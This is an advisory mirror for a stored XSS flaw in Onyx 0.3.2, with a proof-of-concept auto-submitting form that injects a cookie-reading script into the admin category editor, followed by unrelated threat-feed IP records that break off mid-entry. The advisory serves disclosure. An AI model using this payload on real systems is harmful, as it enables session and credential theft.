ID SECURITYVULNS:DOC:24521Type securityvulnsReporter SecurityvulnsModified 2010-08-14T00:00:00
Description
Vulnerability ID: HTB22537
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_onyx_1.html
Product: Onyx
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/onyx )
Vulnerable Version: 0.3.2 and Probably Prior Versions
Vendor Notification: 27 July 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the admin/categories/update script to properly sanitize user-supplied input in "category[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/categories/update/1" method="post" name="main" >
<input type="hidden" name="category[name]" value="General" />
<input type="hidden" name="category[description]" value='My Pictures"><script>alert(document.cookie)</script>' />
<input type="hidden" name="category[created_at(1i)]" value="2010" />
<input type="hidden" name="category[created_at(2i)]" value="7" />
<input type="hidden" name="category[created_at(3i)]" value="23" />
<input type="hidden" name="category[created_at(4i)]" value="04" />
<input type="hidden" name="category[created_at(5i)]" value="00" />
<input type="hidden" name="commit" value="Edit" />
</form>
<script>
document.main.submit();
</script>
{"id": "SECURITYVULNS:DOC:24521", "bulletinFamily": "software", "title": "XSS vulnerability in Onyx", "description": "Vulnerability ID: HTB22537\r\nReference: http://www.htbridge.ch/advisory/xss_vulnerability_in_onyx_1.html\r\nProduct: Onyx\r\nVendor: Hulihan Applications ( http://hulihanapplications.com/projects/onyx ) \r\nVulnerable Version: 0.3.2 and Probably Prior Versions\r\nVendor Notification: 27 July 2010 \r\nVulnerability Type: Stored XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application.\r\n\r\nThe vulnerability exists due to failure in the admin/categories/update script to properly sanitize user-supplied input in "category[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n\r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available:\r\n\r\n<form action="http://host/admin/categories/update/1" method="post" name="main" >\r\n\r\n<input type="hidden" name="category[name]" value="General" />\r\n<input type="hidden" name="category[description]" value='My Pictures"><script>alert(document.cookie)</script>' />\r\n<input type="hidden" name="category[created_at(1i)]" value="2010" />\r\n<input type="hidden" name="category[created_at(2i)]" value="7" />\r\n<input type="hidden" name="category[created_at(3i)]" value="23" />\r\n<input type="hidden" name="category[created_at(4i)]" value="04" />\r\n<input type="hidden" name="category[created_at(5i)]" value="00" />\r\n<input type="hidden" name="commit" value="Edit" />\r\n\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n", "published": "2010-08-14T00:00:00", "modified": "2010-08-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24521", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:36", "edition": 1, "viewCount": 15, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2018-08-31T11:10:36", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220201615", "OPENVAS:1361412562311220201591", "OPENVAS:1361412562311220201590"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2020-0027_CHRONY.NASL", "EULEROS_SA-2020-1615.NASL", "EULEROS_SA-2020-1590.NASL", "ALA_ALAS-2020-1364.NASL", "EULEROS_SA-2020-1591.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "mskb", "idList": ["KB980195", "KB2979597", "KB2586448", "KB2559049", "KB2842632", "KB2647516", "KB2496326"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "amazon", "idList": ["ALAS-2020-1364"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY"]}, {"type": "thn", "idList": ["THN:9F1824BD0EEB6A1695B53AE380D04BF9"]}], "modified": "2018-08-31T11:10:36", "rev": 2}, "vulnersScore": 2.8}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}
{"rst": [{"id": "RST:A4FCE52B-9986-3EE6-ADCB-B53EFBDB2A40", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.242.58", "description": "Found **119[.]82.242.58** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **22**.\n First seen: 2021-08-22T03:00:00, Last seen: 2021-10-13T03:00:00.\n IOC tags: **shellprobe, proxy**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 159 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-14T00:00:00", "modified": "2021-08-22T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-10-13T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f4a60a05aeaf129b0be57c52af40e712"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "8015142da575f8ea3ba4ce06d968b29d"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "57d5f97ad24d93994878fc075962c7e3"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "79b67ba2619451e81108bd7d003d7094"}, {"key": "modified", "hash": "00533afb15eb59d9937203cca00dfe52"}, {"key": "published", "hash": "7570521fc10627be56d7935693fccc14"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "4c8b8a1c2bdb4f63d85da2dbad5e7ffb"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "b1f3a03cda53d4ed3e6a14898c432ce6"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "82bf2f63399b0c113d83dce75d13e8fe51f24dccabf60f66e8ccdd8447239e03", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["119.82.242.58"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.47, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 22.0}, "tags": ["proxy", "shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 159, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:95721A62-F126-3A6C-8A73-E143FB945F34", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.242.60", "description": "Found **119[.]82.242.60** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **1**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-10-12T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 159 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-13T00:00:00", "modified": "2020-12-22T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-10-12T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f4a60a05aeaf129b0be57c52af40e712"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "f0ae9044f4a2f0cafba4eadba7c1d805"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "aa44bdcaf268dd90b23edadd7b9d4530"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "8e71e2202f4e807ac546c4b4c84d40ce"}, {"key": "modified", "hash": "548afddb941bc9ce879976084c7bcc9e"}, {"key": "published", "hash": "367bec30c0ba4b1e1089ea2e16dc01df"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "6bce687a654844e57e50c29fb39e3ee7"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "006ac7e8912a8987866554d5fc50e431e15a63b287f3354ac80771b50b3aed61", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["119.82.242.60"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.09, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 1.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 159, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:B2377D0B-A732-336D-A4C8-73CAB1A5B566", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 123.255.203.32", "description": "Found **123[.]255.203.32** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **4**.\n First seen: 2020-11-13T03:00:00, Last seen: 2021-09-12T03:00:00.\n IOC tags: ****.\nASN 24521: (First IP 123.255.200.0, Last IP 123.255.207.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 144 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-17T00:00:00", "modified": "2020-11-13T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-09-12T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "c0b4f36161f7c604c56c6d6dedb13b16"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "98cebb8b457507d9b406920436a4004f"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "86a065041350af9143503fb95c378eb5"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "feb11a22f160e1f13e28a8b29ff67451"}, {"key": "modified", "hash": "18a93d74cc40a88a84f9058f4408d010"}, {"key": "published", "hash": "7e3c6f4e97f3578ff441d3c31b90c154"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "2efe665ff055e2b4bc92e245d1fa095b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "eb74416ec1543ce6079a19b8e56d73c86820d511a78f0fb1cd6a25fd579ff7d6", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["123.255.203.32"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.09, "ioc_src": 66.95, "ioc_tags": 0.8, "ioc_total": 4.0}, "tags": [], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 144, "firstip": {"netv4": "123.255.200.0", "num": "2080360448"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "123.255.207.255", "num": "2080362495"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "cvss2": {}, "immutableFields": [], "cvss3": {}}, {"id": "RST:91E27243-A94E-3182-888D-EB3844CA5B8F", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 112.109.19.142", "description": "Found **112[.]109.19.142** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **6**.\n First seen: 2021-02-13T03:00:00, Last seen: 2021-09-08T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 112.109.18.0, Last IP 112.109.22.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 144 domains.\nGEO IP information: City \"\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-09T00:00:00", "modified": "2021-02-13T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-09-08T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "ee00baccb5aba608369b99ae01ef79e0"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "43e6e0084b4ff197e7ee3a1e8b62eca2"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8e15ecbd0004850e51f5b34845b302f9"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "43490385fd1f3879050b6e1eee8b46e2"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "17a2292a55b83e338667d3d0a22cbf5c"}, {"key": "modified", "hash": "313c459a8e12b1880da4ad165ae95dcf"}, {"key": "published", "hash": "142b8264e973ce7ade7a5e357f49a595"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "6837398be27b3710d6d3a6092910e115"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "eaa4ea54958300800b7582562d4bf2986653ef9dbdd128b5d7d2c5446df57ac7", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["112.109.19.142"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.14, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 6.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Indonesia", "region": ""}, "asn": {"cloud": "", "domains": 144, "firstip": {"netv4": "112.109.18.0", "num": "1886196224"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "112.109.22.255", "num": "1886197503"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:4952EAF7-6D33-3009-8CC2-29D27A35D680", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 112.109.19.82", "description": "Found **112[.]109.19.82** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-08-25T03:00:00, Last seen: 2021-08-31T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 112.109.18.0, Last IP 112.109.22.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 144 domains.\nGEO IP information: City \"\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-01T00:00:00", "modified": "2021-08-25T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-31T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "ee00baccb5aba608369b99ae01ef79e0"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "14ec9e5a67bd6de28f72de21b2b290c8"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8e15ecbd0004850e51f5b34845b302f9"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6cc0ba90799b310993b728d72959caec"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "d5d53a99d239c68d293e9503f653651d"}, {"key": "modified", "hash": "4367aa6855664a692d7003dbac5729e7"}, {"key": "published", "hash": "4252204fda4833594ff9ac0ff01ecef9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "68c1fc9646ce43a1c36b41b4628181fd"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "dd73faa4c71583c540365f7f0eb74d4619660347f88433f306b4671427e4216b", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["112.109.19.82"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.9, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 42.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Indonesia", "region": ""}, "asn": {"cloud": "", "domains": 144, "firstip": {"netv4": "112.109.18.0", "num": "1886196224"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "112.109.22.255", "num": "1886197503"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": []}, {"id": "RST:0FAC09DB-9C97-3416-B08D-B40EB6230924", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.240.123", "description": "Found **119[.]82.240.123** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **6**.\n First seen: 2021-02-14T03:00:00, Last seen: 2021-08-28T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 165 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-29T00:00:00", "modified": "2021-02-14T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-08-28T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "6f1984743b08470c061afed24d6f46f6"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "2eaa1a216290bba29571715acaeffb3d"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "ea6f50faccbea513572635ba1264e801"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "3cdb0057e34152544c94fb55485315b3"}, {"key": "modified", "hash": "971f1d53c77a28a9d223c49d3873fccc"}, {"key": "published", "hash": "22e44bdcf3e6cdfaa8a8f7fef9bb740b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "d9be0dd2dcd6d12a4dd835b2f238af7c"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "0471f83302ee1fc685d085a2d1c7682df118c9fccf9fb98468cb2358dffa3fab", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["119.82.240.123"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.15, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 6.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 165, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:B9C09B2C-494E-33C1-A579-22526675A6A8", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 203.89.29.134", "description": "Found **203[.]89.29.134** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-08-21T03:00:00, Last seen: 2021-08-27T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 203.89.24.0, Last IP 203.89.30.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 165 domains.\nGEO IP information: City \"Jakarta\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-28T00:00:00", "modified": "2021-08-21T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-27T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "15b1952d45af0fec42d4426babe607ba"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "cd3074c7e22fb06d4f2a2de51738f265"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "de2724d81932f145a49511c3995fb000"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6cc0ba90799b310993b728d72959caec"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "548c399bfda94ac0887ff6654a510ade"}, {"key": "modified", "hash": "831327574f8ba12fbdf1f9e8ad67db25"}, {"key": "published", "hash": "1bddbac4de5860cf52b90f447d30369f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "c6378db7f74a9fbd6cecbc7ff095a814"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "31c3f9fd000f6d873492b765b2751b62722c8be2733aa51b88e8b9b494a007fb", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["203.89.29.134"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.9, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 42.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Jakarta", "country": "Indonesia", "region": "Jakarta"}, "asn": {"cloud": "", "domains": 165, "firstip": {"netv4": "203.89.24.0", "num": "3411613696"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "203.89.30.255", "num": "3411615487"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": []}, {"id": "RST:E6615180-25B7-35EC-ADF1-91A49D4B0D18", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 203.89.28.86", "description": "Found **203[.]89.28.86** in [RST Threat 